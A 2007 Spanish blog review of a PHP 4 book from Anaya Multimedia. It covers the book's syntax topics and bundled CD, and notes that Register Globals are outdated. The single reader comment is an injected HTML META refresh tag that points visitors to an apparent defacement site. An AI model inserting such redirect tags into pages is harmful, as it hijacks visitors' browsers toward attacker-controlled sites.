martes, 27 de marzo de 2007

Libro: php 4

Título: php 4.
Autor: Esteban Trigos García.
Editorial: ANAYA Multimedia.
Año de publicación: 2000.
Incluye: CD con ejemplos, software y la documentacion (el manual) de php 4.
Imágenes:



Más info sobre el índice y demás datos técnicos del libro en este enlace:
http://www.anayamultimedia.es/cgi-...

Mi valoración:
El gran problema de este libro es que queda ya algo anticuado. Este libro salió a la calle el año 2000, cuando recién acababa de ser lanzado php 4.El desarrollo de la versión 4 de php ha avanzado mucho en estos 6/7 años y algunas cosas importantes de las que habla este libro ya no son usadas o han quedado desfasadas.

El ejemplo más claro de esto es el uso de Register Globals, que en php 4.2 pasó a ser desaconsejado por problemas de seguridad.Register Globals viene desactivado por defecto desde esta versión (4.2) y en su lugar se aconseja el uso de Superglobales, que a su vez están disponibles desde la v4.1 de php. En este libro esto ni se menciona, simplemente porque es anterior a todo esto...

Por lo demás, este libro sirve para conocer la sintaxis de php (variables, operadores, instrucciones), explica como crear funciones, arrays, como manipular cadenas o directorios, las funciones de fecha y hora, como conectar php con mysql, el uso de cookies y sesiones... y en definitiva lo necesario para adquirir una buena base en php. También contiene algunos ejemplos prácticos de uso, que podremos verlos en funcionamiento usando el CD-ROM que incluye.

En el CD-ROM además de los ejemplos prácticos, hay software para windows, algo anticuado ya eso sí, como ie 5.0 y 5.5, Netscape 4.5 en español y 4.73 en inglés; y lo necesario para montarte un servidor local (apache 1.3, mysql, php...). También trae una versión del manual de php en inglés.

En definitiva un buen libro para empezar a conocer php4, pero que ya queda anticuado. Si estás interesado en este libro mi consejo es que busques uno más actual, además siempre podrás echar mano del manual php en español.

1 comentario:

Salman dijo...

< META HTTP-EQUIV="Refresh" CONTENT="3; URL=http://anonymousteam.sytes.net/def">